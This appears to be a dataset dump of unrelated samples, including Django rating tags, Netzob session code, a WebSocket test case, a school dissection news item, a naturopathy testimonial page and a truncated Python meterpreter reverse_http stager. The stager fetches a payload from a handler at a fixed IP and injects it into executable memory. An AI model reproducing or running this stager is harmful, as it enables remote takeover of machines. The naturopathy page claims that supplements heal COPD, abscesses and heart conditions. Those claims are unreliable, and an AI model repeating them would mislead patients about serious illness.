text
stringlengths 29
850k
|
|---|
from decimal import Decimal
from django import template
from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.core.urlresolvers import reverse
from django.template.defaultfilters import slugify
from django_ratings.models import TotalRate
from django_ratings.forms import RateForm
from django_ratings.views import get_was_rated
from django.utils.translation import ugettext as _
from recepty import settings
register = template.Library()
DOUBLE_RENDER = getattr(settings, 'DOUBLE_RENDER', False)
#class RateUrlsNode(template.Node):
# def __init__(self, object, up_name, down_name, form_name=None):
# self.object, self.up_name, self.down_name = object, up_name, down_name
# self.form_name = form_name
#
# def render(self, context):
# obj = template.Variable(self.object).resolve(context)
# if obj and hasattr(obj, 'get_absolute_url'):
# context[self.up_name] = '%s%s/%s/' % (obj.get_absolute_url(), _('rate'), _('up'))
# context[self.down_name] = '%s%s/%s/' % (obj.get_absolute_url(), _('rate'), _('down'))
# elif obj:
# ct = ContentType.objects.get_for_model(obj)
# context[self.form_name] = RateForm(initial={'content_type' : ct.id, 'target' : obj._get_pk_val()})
# context[self.up_name] = reverse('rate_up')
# context[self.down_name] = reverse('rate_down')
# return ''
class RateUrlNode(template.Node):
def __init__(self, object, url_var_name, form_name=None):
self.object = object
self.url_var_name =url_var_name
self.form_name = form_name
def render(self, context):
obj = template.Variable(self.object).resolve(context)
if obj and hasattr(obj, 'get_absolute_url'):
context[self.url_var_name] = '%s%s/' % (obj.get_absolute_url(), slugify(_('rate')))
elif obj:
ct = ContentType.objects.get_for_model(obj)
context[self.form_name] = RateForm(initial={'content_type' : ct.id, 'target' : obj._get_pk_val()})
context[self.url_var_name] = reverse('rate')
return ''
#@register.tag('rate_urls')
#def do_rate_urls(parser, token):
# """
# Generate absolute urls for rating the given model up or down and store them in context.
#
# Usage::
#
# {% rate_urls for OBJ as var_up var_down %}
#
# {% rate_urls for OBJ as my_form var_up var_down %}
#
# Examples::
#
# {% rate_urls for object as url_up url_down %}
# <form action="{{url_up}}" method="POST"><input type="submit" value="+"></form>
# <form action="{{url_down}}" method="POST"><input type="submit" value="-"></form>
#
# {% rate_urls for object as rate_form url_up url_down %}
# <form action="{{url_up}}" method="POST">{{rate_form}}<input type="submit" value="+"></form>
# <form action="{{url_down}}" method="POST">{{rate_form}}<input type="submit" value="-"></form>
# """
# bits = token.split_contents()
# if (len(bits) != 6 and len(bits) != 7) or bits[1] != 'for' or bits[3] != 'as':
# raise template.TemplateSyntaxError, "%r .... TODO ....." % token.contents.split()[0]
# if len(bits) == 6:
# return RateUrlsNode(bits[2], bits[4], bits[5])
# else:
# return RateUrlsNode(bits[2], bits[5], bits[6], bits[4])
@register.tag
def rate_url(parser, token):
"""
Fills template variable specified in argument ``tpl_var`` with URL for sending rating value.
Usage::
{% rate_url for object as tpl_var %}
Example::
{% rate_url for object as r_url %}
<form action="{{r_url}}" method="POST">
<input type="text" name="rating" value="0"/>
<input type="submit" value="Rate it"/>
</form>
"""
bits = token.split_contents()
if len(bits) != 5:
raise template.TemplateSyntaxError('rate_rul template tag should be used like this: {% rate_url for object as tpl_var %}')
return RateUrlNode(bits[2], bits[4])
class RatingNode(template.Node):
def __init__(self, object, name, max=None, step=None, min2=None):
self.object, self.name = object, name
self.min, self.max, self.step, self.min2 = min, max, step, min2
def render(self, context):
obj = template.Variable(self.object).resolve(context)
if obj:
value = 0
if (self.min != None and self.max!=None and self.min2 != None):
self.step = Decimal(self.step)
self.min2 = Decimal(self.min2)
self.max = Decimal(self.max)
possible_values = int((self.max - self.min2)/self.step+1)
value = TotalRate.objects.get_normalized_rating(obj, 1, Decimal("1.0")/(possible_values/2))
value = value*(self.max - self.min2)/2 + (self.max+self.min2)/2
# Due to the nature of the 'get_normalized_rating' function, an odd number
# of possible return values is required. If the input parameters yield
# an even number of possible return values, an approximation is necessary.
#
# In the following cycle, the value closest to the obtained result still
# fulfilling the input 'min', 'max' and 'step' parameters is being looked for.
if possible_values%2 == 0:
old_value = self.min2
best_approximation = self.min2
while (1):
cur_value = old_value + self.step
if cur_value > self.max:
break
old_error = abs(old_value - value)
cur_error = abs(cur_value - value)
if cur_error <= old_error:
best_approximation = cur_value
elif cur_error >= best_approximation:
break
old_value = cur_value
value = best_approximation
elif (self.min is not None and self.max is not None):
value = TotalRate.objects.get_normalized_rating(obj, Decimal(self.max), Decimal(self.step))
else:
value = TotalRate.objects.get_total_rating(obj)
# Set as string to be able to compare value in template
context[self.name] = str(value)
return ''
@register.tag('rating')
def do_rating(parser, token):
"""
Get rating for the given object and store it in context under given name.
Usage::
Select total rating:
{% rating for OBJ as VAR %}
Normalize rating to <-X, X> with step Y and round to Z:
{% rating for OBJ max X step Y as VAR %}
Normalize rating to <X, Y> with step S:
{% rating for OBJ min X max Y step S as VAR %}
Notice:
In order to obtain correct results, (Y-X)/S must be in Z (integers).
Also, (Y-X)/S+1 (number of possible values the function can return)
should preferably be an odd number, as it better corresponds to
the way the 'get_normalized_rating' function works.
Examples::
{% rating for object as object_rating %}
object {{object}} has rating of {{object_rating}}
{% rating for object max 1 step 0.5 as object_rating %}
object {{object}} has rating of {{object_rating}} from (-1, -0.5, 0, 0.5, 1)
"""
bits = token.split_contents()
if len(bits) == 5 and bits[1] == 'for' and bits[3] == 'as':
return RatingNode(bits[2], bits[4])
if len(bits) == 9 and bits[1] == 'for' and bits[3] == 'max' \
and bits[5] == 'step' and bits[7] == 'as':
return RatingNode(bits[2], bits[8], bits[4], bits[6])
if len(bits) == 11 and bits[1] == 'for' and bits[3] == 'min' \
and bits[5] == 'max' and bits[7] == 'step' and bits[9] == 'as':
return RatingNode(bits[2], bits[10], bits[6], bits[8], bits[4])
raise template.TemplateSyntaxError, \
"{% rating for OBJ as VAR %} or {% rating for OBJ max X step Y as VAR %}"
class WasRatedNode(template.Node):
def __init__(self, object, name):
self.object, self.name = object, name
def render(self, context):
object = template.Variable(self.object).resolve(context)
ct = ContentType.objects.get_for_model(object)
context[self.name] = get_was_rated(context['request'], ct, object)
return ''
@register.tag('was_rated')
def do_was_rated(parser, token):
"""
{% was_rated for OBJ as VAR %}
"""
bits = token.split_contents()
if len(bits) == 5 and bits[1] == 'for' and bits[3] == 'as':
return WasRatedNode(bits[2], bits[4])
raise template.TemplateSyntaxError, "{% was_rated for OBJ as VAR %}"
class TopRatedNode(template.Node):
def __init__(self, count, name, mods=None):
self.count, self.name, self.mods = count, name, mods
def render(self, context):
context[self.name] = TotalRate.objects.get_top_objects(self.count, self.mods)
return ''
@register.tag('top_rated')
def do_top_rated(parser, token):
"""
Get list of COUNT top rated objects of given model and store them in context under given name.
Usage::
{% top_rated 5 [app.model ...] as var %}
Example::
{% top_rated 10 as top_rated_objects %}
{% for obj in top_rated_objects %} ... {% endfor %}
{% top_rated 10 articles.article as top_articles %}
{% for article in top_articles %} ... {% endfor %}
{% top_rated 10 articles.article photos.photo as top_objects %}
{% for obj in top_objects %} ... {% endfor %}
"""
bits = token.split_contents()
if len(bits) < 3 or bits[-2] != 'as':
raise template.TemplateSyntaxError, "%r .... TODO ....." % token.contents.split()[0]
count = int(bits[1])
mods = []
for mod in bits[2:-2]:
model = models.get_model(*mod.split('.', 1))
if not model:
raise template.TemplateSyntaxError, "%r .... TODO ....." % token.contents.split()[0]
mods.append(model)
return TopRatedNode(count, bits[-1], mods)
class IfWasRatedNode(template.Node):
def __init__(self, nodelist_true, nodelist_false, obj=None, ct=None, pk=None):
self.nodelist_true = nodelist_true
self.nodelist_false = nodelist_false
self.obj= None
if obj:
self.obj = template.Variable(obj)
self.ct = ct
self.pk = pk
def render(self, context):
if self.obj:
obj = self.obj.resolve(context)
ct = ContentType.objects.get_for_model(obj).id
pk = obj.pk
else:
ct = self.ct
pk = self.pk
if DOUBLE_RENDER and 'SECOND_RENDER' not in context:
return u"{%% load ratings %%}" \
u"{%% if_was_rated %(ct)s:%(pk)s %%}" \
u"%(nodelist_true)s{%% else %%}%(nodelist_false)s{%% endif_was_rated %%}" % ({
'ct' : ct,
'pk' : pk,
'nodelist_true' : self.nodelist_true.render(context),
'nodelist_false' : self.nodelist_false.render(context),
})
if get_was_rated(context['request'], ct, pk):
return self.nodelist_true.render(context)
else:
return self.nodelist_false.render(context)
@register.tag('if_was_rated')
def do_if_was_rated(parser, token):
"""
{% if_was_rated object %}...{% else %}...{% endif_was_rated %}
"""
bits = token.contents.split()
if len(bits) == 2:
kwargs = {}
# Opening tag
obj = bits[1]
if ":" in obj:
ct,pk = obj.split(":")
kwargs.update({"ct":int(ct), "pk":int(pk)})
else:
kwargs.update({"obj":obj})
# Nodelist true
nodelist_true = parser.parse(('else', 'endif_was_rated'))
token = parser.next_token()
kwargs.update({"nodelist_true":nodelist_true})
# Nodelist false
if token.contents == 'else':
nodelist_false = parser.parse(('endif_was_rated',))
kwargs.update({"nodelist_false":nodelist_false})
parser.delete_first_token()
else:
nodelist_false = template.NodeList()
return IfWasRatedNode(**kwargs)
raise template.TemplateSyntaxError, "{%% %s object %%}" % bits[0]
|
Students from SMART’s three secondary schools were able to get hands on with Operating Theatre Live, a unique dissection-based surgical experience.
The event, which was held at Liskeard School and Community College, saw students from Liskeard, saltash.net community school and Looe Community Academy relish the opportunity to work with lifelike cadavers to gain a better understanding of anatomy and physiology.
Students started the day by learning how to assess and communicate with their patient and then prepare them for surgery, before independently calculating the required concentration and dosage before anesthetising their patient.
Once anaesthetised, students looked at the structure, role and physiology of the brain and eye. They were able to remove the brain from the cranial vault and identify structures such as the cerebellum. Following this, students learned to intubate their patient and dissected the lungs and heart.
Head of Science at Liskeard School, Mrs Michelle Inger, was delighted with the students’ response.
“The buzz and excitement in the room throughout the session was absolutely amazing, with students embracing the fantastic opportunity. Students were communicating in clinical terminology and were able to experience something truly unique. They had a brilliant time and left with a whole new world of opportunity. It was also great to invite our friends from Looe and Saltash to join us and take part,” she said.
One of the saltash.net students who took part in the trip, Matthew Sanders, really enjoyed the event.
“I found Operating Theatre Live very informative, as it clearly shows how the body functions. This trip will definitely benefit my Biology studies, as I now have a greater understanding about how the human anatomy works. I would like to thank Operating Theatre Live for the opportunity and also Liskeard School for hosting the event,” he said.
|
# -*- coding: utf-8 -*-
#+---------------------------------------------------------------------------+
#| 01001110 01100101 01110100 01111010 01101111 01100010 |
#| |
#| Netzob : Inferring communication protocols |
#+---------------------------------------------------------------------------+
#| Copyright (C) 2011-2014 Georges Bossert and Frédéric Guihéry |
#| This program is free software: you can redistribute it and/or modify |
#| it under the terms of the GNU General Public License as published by |
#| the Free Software Foundation, either version 3 of the License, or |
#| (at your option) any later version. |
#| |
#| This program is distributed in the hope that it will be useful, |
#| but WITHOUT ANY WARRANTY; without even the implied warranty of |
#| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
#| GNU General Public License for more details. |
#| |
#| You should have received a copy of the GNU General Public License |
#| along with this program. If not, see <http://www.gnu.org/licenses/>. |
#+---------------------------------------------------------------------------+
#| @url : http://www.netzob.org |
#| @contact : contact@netzob.org |
#| @sponsors : Amossys, http://www.amossys.fr |
#| Supélec, http://www.rennes.supelec.fr/ren/rd/cidre/ |
#+---------------------------------------------------------------------------+
#+---------------------------------------------------------------------------+
#| Standard library imports
#+---------------------------------------------------------------------------+
import uuid
#+---------------------------------------------------------------------------+
#| Related third party imports
#+---------------------------------------------------------------------------+
#+---------------------------------------------------------------------------+
#| Local application imports
#+---------------------------------------------------------------------------+
from netzob.Common.Utils.Decorators import typeCheck, NetzobLogger
from netzob.Common.Models.Vocabulary.Messages.AbstractMessage import AbstractMessage
from netzob.Common.Utils.SortedTypedList import SortedTypedList
from netzob.Common.Utils.TypedList import TypedList
from netzob.Common.Models.Vocabulary.ApplicativeData import ApplicativeData
from netzob.Common.Models.Vocabulary.AbstractField import AbstractField
@NetzobLogger
class Session(object):
"""A session includes messages exchanged in the same session. Messages
are automaticaly sorted.
Applicative data can be attached to sessions.
>>> import time
>>> from netzob.all import *
>>> # we create 3 messages
>>> msg1 = RawMessage("ACK", source="A", destination="B", date=time.mktime(time.strptime("9 Aug 13 10:45:05", "%d %b %y %H:%M:%S")))
>>> msg2 = RawMessage("SYN", source="A", destination="B", date=time.mktime(time.strptime("9 Aug 13 10:45:01", "%d %b %y %H:%M:%S")))
>>> msg3 = RawMessage("SYN/ACK", source="B", destination="A", date=time.mktime(time.strptime("9 Aug 13 10:45:03", "%d %b %y %H:%M:%S")))
>>> session = Session([msg1, msg2, msg3])
>>> print session.messages.values()[0]
[0;32m[1376037901.0 [0;m[1;32mA[1;m[0;32m->[0;m[1;32mB[1;m[0;32m][0;m 'SYN'
>>> print session.messages.values()[1]
[0;32m[1376037903.0 [0;m[1;32mB[1;m[0;32m->[0;m[1;32mA[1;m[0;32m][0;m 'SYN/ACK'
>>> print session.messages.values()[2]
[0;32m[1376037905.0 [0;m[1;32mA[1;m[0;32m->[0;m[1;32mB[1;m[0;32m][0;m 'ACK'
"""
def __init__(self, messages=None, _id=None, applicativeData=None, name="Session"):
"""
:parameter messages: the messages exchanged in the current session
:type data: a list of :class:`netzob.Common.Models.Vocabulary.Messages.AbstractMessage.AbstractMessage`
:parameter _id: the unique identifier of the session
:type _id: :class:`uuid.UUID`
:keyword applicativeData: a list of :class:`netzob.Common.Models.Vocabulary.ApplicaticeData.ApplicativeData`
"""
self.__messages = SortedTypedList(AbstractMessage)
self.__applicativeData = TypedList(ApplicativeData)
if messages is None:
messages = []
self.messages = messages
if _id is None:
_id = uuid.uuid4()
self.id = _id
if applicativeData is None:
applicativeData = []
self.applicativeData = applicativeData
self.name = name
@property
def id(self):
"""The unique identifier of the session.
:type: :class:`uuid.UUID`
"""
return self.__id
@id.setter
@typeCheck(uuid.UUID)
def id(self, _id):
if _id is None:
raise TypeError("Id cannot be None")
self.__id = _id
@property
def messages(self):
"""The messages exchanged in the current session.
Messages are sorted.
:type: a :class:`netzob.Common.Utils.TypedList.TypedList` of :class:`netzob.Common.Models.Vocabulary.Messages.AbstractMessage.AbstractMessage`
"""
return self.__messages
def clearMessages(self):
"""Delete all the messages attached to the current session"""
for msg in self.__messages.values():
msg.session = None
self.__messages.clear()
@messages.setter
def messages(self, messages):
if messages is None:
messages = []
# First it checks the specified messages are all AbstractMessages
for msg in messages:
if not isinstance(msg, AbstractMessage):
raise TypeError("Cannot add messages of type {0} in the session, only AbstractMessages are allowed.".format(type(msg)))
self.clearMessages()
for message in messages:
self.__messages.add(message)
message.session = self
@property
def applicativeData(self):
"""Applicative data attached to the current session.
>>> from netzob.all import *
>>> appData = ApplicativeData("test", Decimal(20))
>>> session = Session(applicativeData=[appData])
>>> print len(session.applicativeData)
1
>>> appData2 = ApplicativeData("test2", ASCII("helloworld"))
>>> session.applicativeData.append(appData2)
>>> print len(session.applicativeData)
2
>>> print session.applicativeData[0]
Applicative Data: test=Decimal=20 ((8, 8)))
>>> print session.applicativeData[1]
Applicative Data: test2=ASCII=helloworld ((0, 80)))
:type: a list of :class:`netzob.Common.Models.Vocabulary.ApplicativeData.ApplicativeData`.
"""
return self.__applicativeData
def clearApplicativeData(self):
while(len(self.__applicativeData) > 0):
self.__applicativeData.pop()
@applicativeData.setter
def applicativeData(self, applicativeData):
for app in applicativeData:
if not isinstance(app, ApplicativeData):
raise TypeError("Cannot add an applicative data with type {0}, only ApplicativeData accepted.".format(type(app)))
self.clearApplicativeData()
for app in applicativeData:
self.applicativeData.append(app)
@property
def name(self):
return self.__name
@name.setter
@typeCheck(str)
def name(self, _name):
if _name is None:
raise TypeError("Name cannot be None")
self.__name = _name
def getEndpointsList(self):
"""Retrieve all the endpoints couples that are present in the
session.
>>> from netzob.all import *
>>> msg1 = RawMessage("SYN", source="A", destination="B")
>>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
>>> msg3 = RawMessage("ACK", source="A", destination="C")
>>> session = Session([msg1, msg2, msg3])
>>> print len(session.getEndpointsList())
2
>>> print session.getEndpointsList()
[('A', 'B'), ('A', 'C')]
:return: a list containing couple of endpoints (src, dst).
:rtype: a :class:`list`
"""
endpointsList = []
for message in self.messages.values():
src = message.source
dst = message.destination
endpoints1 = (src, dst)
endpoints2 = (dst, src)
if (not endpoints1 in endpointsList) and (not endpoints2 in endpointsList):
endpointsList.append(endpoints1)
return endpointsList
def getTrueSessions(self):
"""Retrieve the true sessions embedded in the current
session. A session is here characterized by a uniq endpoints
couple.
TODO: a more precise solution would be to use flow
reconstruction (as in TCP).
>>> from netzob.all import *
>>> msg1 = RawMessage("SYN", source="A", destination="B")
>>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
>>> msg3 = RawMessage("ACK", source="A", destination="C")
>>> session = Session([msg1, msg2, msg3])
>>> print len(session.getTrueSessions())
2
>>> for trueSession in session.getTrueSessions():
... print trueSession.name
Session: 'A' - 'B'
Session: 'A' - 'C'
:return: a list containing true sessions embedded in the current session.
:rtype: a :class:`list`
"""
trueSessions = []
for endpoints in self.getEndpointsList():
trueSessionMessages = []
src = None
dst = None
for message in self.messages.values():
if message.source in endpoints and message.destination in endpoints:
trueSessionMessages.append(message)
if src is None:
src = message.source
if dst is None:
dst = message.destination
trueSession = Session(messages=trueSessionMessages, applicativeData=self.applicativeData, name="Session: '" + str(src) + "' - '" + str(dst) + "'")
trueSessions.append(trueSession)
return trueSessions
def isTrueSession(self):
"""Tell if the current session is true. A session is said to
be true if the communication flow pertain to a uniq
applicative session between a couple of endpoints.
>>> from netzob.all import *
>>> msg1 = RawMessage("SYN", source="A", destination="B")
>>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
>>> msg3 = RawMessage("ACK", source="A", destination="B")
>>> session = Session([msg1, msg2, msg3])
>>> print session.isTrueSession()
True
:return: a boolean telling if the current session is a true one (i.e. it corresponds to a uniq applicative session between two endpoints).
:rtype: a :class:`bool`
"""
if len(self.getTrueSessions()) == 1:
return True
else:
return False
@typeCheck(list)
def abstract(self, symbolList):
"""This method abstract each message of the current session
into symbols according to a list of symbols given as
parameter.
>>> from netzob.all import *
>>> symbolSYN = Symbol([Field(ASCII("SYN"))], name="Symbol_SYN")
>>> symbolSYNACK = Symbol([Field(ASCII("SYN/ACK"))], name="Symbol_SYNACK")
>>> symbolACK = Symbol([Field(ASCII("ACK"))], name="Symbol_ACK")
>>> symbolList = [symbolSYN, symbolSYNACK, symbolACK]
>>> msg1 = RawMessage("SYN", source="A", destination="B")
>>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
>>> msg3 = RawMessage("ACK", source="A", destination="B")
>>> session = Session([msg1, msg2, msg3])
>>> if session.isTrueSession():
... for src, dst, sym in session.abstract(symbolList):
... print str(src) + " - " + str(dst) + " : " + str(sym.name)
A - B : Symbol_SYN
B - A : Symbol_SYNACK
A - B : Symbol_ACK
:return: a list of tuples containing the following elements : (source, destination, symbol).
:rtype: a :class:`list`
"""
abstractSession = []
if not self.isTrueSession():
self._logger.warn("The current session cannot be abstracted as it not a true session (i.e. it may contain inner true sessions).")
return abstractSession
for message in self.messages.values():
symbol = AbstractField.abstract(message.data, symbolList)
abstractSession.append((message.source, message.destination, symbol))
return abstractSession
|
"Clinical Nutrition and Naturopathy Works!"
A message from Dr. Smith: "On this webpage, you will read either a client's personal testimony or a clinical nutrition case history on an actual client as it pertains to the various health challenges presented below. Because I have successfully helped thousands of clients improve their health since starting my business in 1981, the below obviously represents only a few of these clients, so periodically, new testimonies and case histories will be posted. Additionally, the below represents some of the most frequent health challenges people are suffering with today, as well as a few of the most severe or unusual cases. Therefore, If the health challenge(s) you are suffering with is not listed below, please feel free to contact me and I will be glad to share the improvement other clients have experienced, who were suffering with the same health challenges as you before they started Clinical Nutrition Therapy.." You may contact me by email by clicking this link to Services@AdvancedClinicalNutrition.com or by phone at (940) 761-4045, whichever you prefer."
My Dentist said I had an abscessed tooth and he would not clean my teeth until it was gone. He gave me an antibiotic prescription. However, I prefer to treat my body with whole food supplements, so, I contacted Dr. Smith. She designed an internal supplement program to strengthen my immune system and digest germs. She gave me an herbal powder and oil to make a poultice (paste) to apply externally around the infected tooth at bedtime. About two weeks later, I saw my dentist again. He said the abscess was gone and so he cleaned my teeth. He was amazed that Dr. Smith's recommendations helped to heal my tooth, gums and improved my dental hygiene. (Pat 72y, Wichita Falls, Tx).
My Chiropractor told me on my last visit that because of the Clinical Nutrition Therapy I am receiving from Dr. Smith that his chiropractic adjustments are 50% reduced from what they used to be and that he only needs to adjust me once every two months, instead of monthly. He also said, 'so whatever Dr. Smith is doing for you, keep it up' because it is really helping my musculo-skeletal system. (Tom 70y, Cypress, Tx).
A Word from Dr. Smith: "Besides physical injuries, the primary causes for subluxations (misalignments of the vertebrae of the spine) are Nutritional Deficiencies in the musculo-skeletal system, which then leads to pain and dysfunction of the organs and glands associated with the nerves in the vertebra as well as the muscles, joints and other parts of the musculo-skeletal system. Obtaining a Clinical Nutritional Analysis of your biochemistry to identify your nutritional deficiencies and then correcting them through Clinical Nutrition Therapy is required to hold Chiropractic Adjustments so vertebrae and spine realign and stay in place. This is what we do here at AdvancedClinicalNutrition.com.
When I was referred by my daughter, who was also helped by Dr. Smith, I felt like I had been tired all of my life. I am a Certified Public Accountant (C.P.A.) and during tax season, my energy was even more exhausted due to many long hours of work for the 2-3 months before April 15th. Within months my energy was restored,. I have also lost 17 pounds, and a neck pain I have had for years and thought I would have to live with for the rest of my life is 90% improved already. This year during tax season, my energy was great. (Tom 68y, Cypress, Tx).
"I suffered with the symptoms of COPD for few years before I was referred to Dr. Smith, in six months my lungs were healed and I no longer had COPD."
To read more about the experiences of other clients who were suffering with COPD, Bronchitis, Emphysema, and Lung Cancer when they first started Clinical Nutrition Therapy, click on the PDF Document to the right. This document also includes the case history of a hospitalized patient, dying and in a COPD coma, when Clinical Nutrition Therapy was started.
A Word From Dr. Smith: The term "bio-identical" is misleading because when the hormone(s) is extracted from a plant, which means only the hormone is removed and the other nutrients that make it safe and effective is discarded. Only hormones ingested in the whole plant or food is truly bio-identical. Long-term use (four months or longer) of bio-identical hormones results in interfering with the body's ability to produce its own hormones and ultimately leads to more severe hormone imbalance. Bio-identical hormones are "plant-based drugs," which we call "nutritional drugs", that suppress hormone symptoms, just like synthetic (chemical) drugs (ex: Premarin), though Premarin is more toxic. Clinical studies have proven that long-term use of Premarin causes breast and uterine cancer.
(Continue reading this webpage for more on Symptoms of Hormone Imbalances.
�I had severe migraines for 30 years and chronic diarrhea for 15 years. Dr. Smith did nutritional testing and put me on whole food supplements. Within 6 months I got rid of the diarrhea. Within 3 months I started noticing the migraines were getting less frequent. Within a year I no longer had migraines. It is now 4, nearly 5 years later and the only headaches I have are my husband and kids and I can't remember the last time I had diarrhea!!!!!
This patient posted her clinical nutrition success story anonymously in an online business directory review in regard to their experience at Advanced Clinical Nutrition, under the care of Dr. Smith.
Approximately six months ago, I was referred to Advanced Clinical Nutrition. I had been suffering with severe HOT FLASHES and sleepless nights, by the time morning had arise I was exhausted and my day had just begun. The extra 10 pounds didn't help nor make me feel any better. I cannot tell you how the therapeutic supplements from Advanced Clinical Nutrition has worked for me. My hot flashes have now subsided, no more pure exhaustion and I sleep like a rock star. I feel fantastic and couldn't be happier.
Thank you sooooo much Dr. Smith.
Unbeknownst to Dr. Smith, this patient posted her clinical nutrition success story on YellowPages.com and gave Dr. Smith a FIVE STAR RATING. Thank you Sondra.
At the young age of 23, Carol suffered with such severe episodes of rapid heartbeats that her entire body would shake like she was having a seizure without the rolling eyes. These episodes had been occurring several times a week for many months and sometimes she experienced several episodes in the same day. When not having these episodes, her heart beat was faster than normal.
Before contacting Dr. Smith, Carol had been to a number of physicians, who had performed extensive medical testing and heart stress examinations. However, because the results from these tests and exams were normal, none of these physicians could find the cause for her rapid heartbeats. Also, her condition was getting worse from the medicines they prescribed.
Because a Clinical Nutrition Analysis or interpretation of Laboratory Testing and Medical Examinations can identify causes that cannot be identified from a "medical" interpretation of the same tests and examinations, several of her relatives referred her to Advanced Clinical Nutrition. These relatives were also clients of Dr. Smith, who were experiencing improved health through Clinical Nutrition Therapy.
The fact that Carol had such severe rapid heartbeats, it was obvious she had a weak, dysfunctional heart and Dr. Smith's Clinical Nutrition Analysis proved this. Within a few weeks on Clinical Nutrition Therapy, Carol no longer experienced episodes where her body would shake when her rapid heartbeats were most severe.
Within a month, her heart had improved to normal heartbeat rhythm. Three months later, because her Clinical Nutrition Therapy had provided a sufficient amount of the specific nutrients her heart required for restoring its function, Carol's heart was strong and healthy, Dr. Smith discontinued her therapy. (Carol, 23y, Nocona, TX).
While reading the above, you may have wondered, "Since her symptom of rapid heartbeats was obviously a heart condition, why were all her medical laboratory tests and examinations, which were performed by several physicians, showing normal?" The reason is because her condition had not advanced to a life-threatening or disease stage, which is where the condition of any organ or gland must be in order to be identified by a medical interpretation and Carol's condition, was not in this advanced stage.
Stage 1 - nutritional deficiencies and toxicity, In Carol's case, these deficiencies and toxins were in her heart and circulatiory system. If Stage 1 is not corrected, the causes become more severe and advances to stage 2.
Stage 2 - biochemical imbalance. In Carol's case, long-term deficiences and toxicity in time cause biochemical imbalances in the heart and circulatory system. If Stage 2 is not corrected, the causes become more severe and advances to Stage 3.
Stage 3 - organ, gland and/or body system dysfunction. In Carol's care, the rhythm of her heartbeats became irregular and rapid. If Stage 3 is not corrected, Carol would have advanced to Stage 4.
Stage 4 - disease develops in the dysfunctional organ, gland and/or body system and/or the state of the condition of the organ, gland or body system is life-threatening.
The first three stages can only be identified through a Clinical Nutrition Analysis. Carol was in stage 3 and had she not received Clinical Nutrition Therapy, in time, she would have advanced to the fourth stage, and in that stage her physicians would have been able to identify her heart condition through their medical interpretation of her lab tests and examinations. However, their drug therapy would have only suppressed the heart's ability to produce the symptoms of rapid heartbeats.
Their drug therapy would not have been able to help her heart heal and so given a bit more time, Carol's heart would have been so over-worked and stressed from constantly beating too rapidly that it would have stopped beating and Carol would have died at a young age. Because of the drugs suppressing her body’s ability to feel the rapid heartbeats, Carol would have had no warning of impending premature death.
Note: When medical tests are normal, this is always good news because it means that the condition for which the tests have been ordered has not advanced to the fourth stage. So now that you have ruled out disease or a life-threatening medical condition, the next step is to Clinical Nutrition Analysis of your medical tests to identify the cause of your symptoms and so the stage you are in can be identified. Then you can receive the appropriate Clinical Nutrition Therapy to help your body heal and prevent it from progressing to the advanced stage 4, where your physician is able to diagnose a disease, like cancer, or some other life-threatening condition in one or more organs, glands or body systems or even worse experience sudden death.
|
###############################################################################
##
## Copyright 2011 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from case import Case
class Case9_2_1(Case):
DESCRIPTION = """Send binary message message with payload of length 64 * 2**10 (64k)."""
EXPECTATION = """Receive echo'ed binary message (with payload as sent)."""
def init(self):
self.DATALEN = 64 * 2**10
self.PAYLOAD = "\x00\xfe\x23\xfa\xf0"
self.WAITSECS = 10
self.reportTime = True
def onOpen(self):
self.p.createWirelog = False
self.behavior = Case.FAILED
self.expectedClose = {"closedByMe":True,"closeCode":[self.p.CLOSE_STATUS_CODE_NORMAL],"requireClean":True}
self.result = "Did not receive message within %d seconds." % self.WAITSECS
self.p.sendFrame(opcode = 2, payload = self.PAYLOAD, payload_len = self.DATALEN)
self.p.closeAfter(self.WAITSECS)
def onMessage(self, msg, binary):
if not binary:
self.result = "Expected binary message with payload, but got text."
else:
if len(msg) != self.DATALEN:
self.result = "Expected binary message with payload of length %d, but got %d." % (self.DATALEN, len(msg))
else:
## FIXME : check actual content
##
self.behavior = Case.OK
self.result = "Received binary message of length %d." % len(msg)
self.p.createWirelog = True
self.p.sendClose(self.p.CLOSE_STATUS_CODE_NORMAL)
|
This is a placeholder page for Harry Purdy, which means this person is not currently on this site. We do suggest using the tools below to find Harry Purdy.
You are visiting the placeholder page for Harry Purdy. This page is here because someone used our placeholder utility to look for Harry Purdy. We created this page automatically in hopes Harry Purdy would find it. If you are not Harry Purdy, but are an alumni of Baxter Springs High School, register on this site for free now.
|
#
# Python windows/meterpreter/reverse_http stager
# (doesn't rely on shellcode)
#
# By: @harmj0y
#
import httplib, string, random, struct, ctypes, time
# helper for the metasploit http checksum algorithm
def checksum8(s):
# hard rubyish way -> return sum([struct.unpack('<B', ch)[0] for ch in s]) % 0x100
return sum([ord(ch) for ch in s]) % 0x100
# generate a metasploit http handler compatible checksum for the URL
def genHTTPChecksum():
chk = string.ascii_letters + string.digits
for x in xrange(64):
uri = "".join(random.sample(chk,3))
r = "".join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))
for char in r:
if checksum8(uri + char) == 92:
return uri + char
def connect():
# establish a HTTPS connection to the metasploit handler
c = httplib.HTTPSConnection("192.168.30.129", 443)
# get our checksumed resource
c.request("GET", "/" + genHTTPChecksum() )
response = c.getresponse()
# only return data if it was http code 200
if response.status == 200: return response.read()
else: return ""
# injects the meterpreter .dll into memory
def inject(dll):
# make sure we have something to inject
if dll != "":
# read in the meterpreter .dll and convert it to a byte array
shellcode = bytearray(dll)
# use types windll.kernel32 for virtualalloc reserves region of pages in virtual addres sspace
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# use virtuallock to lock region for physical address space
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode)))
# read in the buffer
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
# moved the memory in 4 byte blocks
